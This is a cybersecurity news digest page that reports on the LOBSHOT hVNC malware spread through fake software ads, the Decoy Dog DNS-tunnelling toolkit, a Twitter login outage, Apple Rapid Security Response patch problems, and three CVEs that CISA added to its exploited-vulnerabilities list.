Hackerzhome

hackerzhome-logo-bg

Cybersecurity news all over the world

HACKERZHOME NEWS

May 2, 2023

Tuesday

Hackers now have concealed VNC access to Windows devices thanks to new LOBSHOT spyware.

Threat actors can use hVNC to covertly take control of compromised Windows PCs thanks to a new malware called ‘LOBSHOT’ that is spread through Google advertisements.


These marketing campaigns mimicked the appearance of websites for a variety of programs, including 7-ZIP, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus, and many more.


Instead of disseminating legitimate software, these websites promoted malware including Gozi, RedLine, Vidar, Cobalt Strike, SectoRAT, and the Royal Ransomware.


A malicious MSI file was distributed by this website, and it ran a PowerShell command to download a DLL from download-cdn[.]com, a website that has previously been linked to the TA505/Clop ransomware gang.


It is unknown if TA505 is still utilizing this domain, although Proofpoint threat researcher Tommy Madjar previously informed BleepingComputer that it had previously changed hands.


The virus known as LOBSHOT is contained in the downloaded DLL file, which will be executed by RunDLL32.exe after being saved to the C: ProgramData folder.


Since last July, we have viewed more than 500 different LOBSHOT samples. According to the Elastic Security Labs research, the samples we have seen are often constructed as 32-bit DLLs or 32-bit executables between 93 KB and 124 KB in size.


Once it has been run, the malware will check to see if Microsoft Defender is currently active and, if it is, it will stop running in order to avoid detection.

NEWS 1
Hackers now have concealed VNC access to Windows devices thanks to new LOBSHOT spyware.

Breaking news

LIVE

You are not up to date!

Subscribe to our newsletter and stay updated on cybersecurity news

You can't log back in due to a Twitter outage.

Many users have been logged out of the website due to a Twitter outage, and they are unable to log back in.

Around 3:45 PM ET, thousands of Twitter users reported having problems with DownDetector after being abruptly logged out of the desktop website.

The logins would appear to operate when attempting to log back into the website, however, the site would instead lead you to the logout URL.

My account was locked out in Mozilla Firefox, but not in Google Chrome, suggesting that this issue appears to only affect Chrome and Chromebook users.

The website asked me for more details after I tried to connect back to Twitter with Google Chrome a second time, claiming that the account had strange activity.

Other individuals who are impacted by the constant cycle of logins and logouts do not appear to experience this in the same way.

We will probably have to wait for the outage to end itself because neither Twitter’s status page nor its support account has any issues noted.

NEWS 2

For placing advertisements and promotions in this newspaper, or anywhere on our website, contact us through email at [email protected] or fill out this contact form.

Share this news:

May 2, 2023 /

Tuesday

Hackerzhome News

2

Have you heard?
Google Bans 173,000 Bad Accounts And 1.43 Million Malicious Apps In 2022 K now more!

iPhones are unable to install Apple's initial Rapid Security Response patch.

iPhones are unable to install Apple's initial Rapid Security Response patch.

Some users are having trouble installing Apple’s first Rapid Security Response (RSR) patches on their iPhones for iOS 16.4.1 and macOS 13.3.1 devices.

RSR patches, as the business explains in a recently released support page, are brief upgrades that target the iPhone, iPad, and Mac platforms and fix security flaws in between significant software releases.

There is a chance that some of these out-of-band security patches will also be utilized to fix flaws that are being actively leveraged in attacks.
To find out if RSR patches are accessible for your device, perform these steps:

1. iPad or iPhone Make sure “Security Responses & System Files” is enabled by going to Settings > General > Software Update > Automatic Updates.

2. Mac: Select System Settings from the Apple menu. Click Software Update on the right after selecting General from the sidebar. Select “Install Security Responses and system files” and then click the Show Details button next to Automatic Updates.

NEWS 3

Enterprise networks are the target of a newly discovered Decoy Dog malware toolkit.

Enterprise networks are the target of a newly discovered Decoy Dog malware toolkit.
NEWS 4

An advanced malware toolkit called Decoy Dog that targets enterprise networks was found after an investigation of more than 70 billion DNS records.

As its name suggests, Decoy Dog is elusive and uses methods like DNS query dribbling and strategic domain aging, which transmits a succession of inquiries to the command-and-control (C2) domains without raising any red flags.

In a late-last-month advisory, Infoblox stated that Decoy Dog is a cohesive toolkit with a lot of highly odd features that make it distinctively distinguishable. This is especially true when looking at its domains at the DNS level.

The cybersecurity company claimed that the malware’s unique properties allowed it to map more domains that are a part of the assault infrastructure. The malware was discovered in early April 2023 as a result of aberrant DNS beaconing behavior, the business said.

The DNS signature of Decoy Dog matches less than 0.0000027% of the 370 million active domains on the internet, making its use in the wild “very rare,” according to the California-based startup.

Pupy RAT, an open-source trojan that is distributed using DNS tunneling, in which DNS queries and responses are utilized as a C2 for covertly dropping payloads, is one of the main components of the toolkit.

Alert: TP-Link, Apache, and Oracle Vulnerabilities Are Being Actively Exploited

Based on proof of active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three vulnerabilities to the list of Known Exploited Vulnerabilities (KEV).

The following are the security flaws: CVE-2023-1389 (CVSS score: 8.8), CVE-2021-45046 (CVSS score: 9.0), CVE-2023-21839 (CVSS score: 7.5).

CVE-2023-1389 is a command injection issue that affects TP-Link Archer AX-21 routers and might be used to execute code remotely.

The vulnerability has been exploited by threat actors connected to the Mirai botnet since April 11, 2023, according to Trend Micro’s Zero Day Initiative.

CVE-2021-45046, a remote code execution weakness affecting the Apache Log4j2 logging library, is the second vulnerability to be added to the KEV catalog. It was discovered in December 2021.

Although data gathered by GreyNoise indicates evidence of exploitation attempts from as many as 74 different IP addresses over the past 30 days, it is currently unclear how this specific vulnerability is being exploited in the wild. However, this also applies to CVE-2021-44228.

A high-severity problem in Oracle WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 that might permit unauthorized access to sensitive data rounds out the list.

Alert TP-Link, Apache, and Oracle Vulnerabilities Are Being Actively Exploited
NEWS 5

For placing advertisements and promotions in this newspaper, or anywhere on our website, contact us through email at [email protected] or fill out this contact form.

Share this news: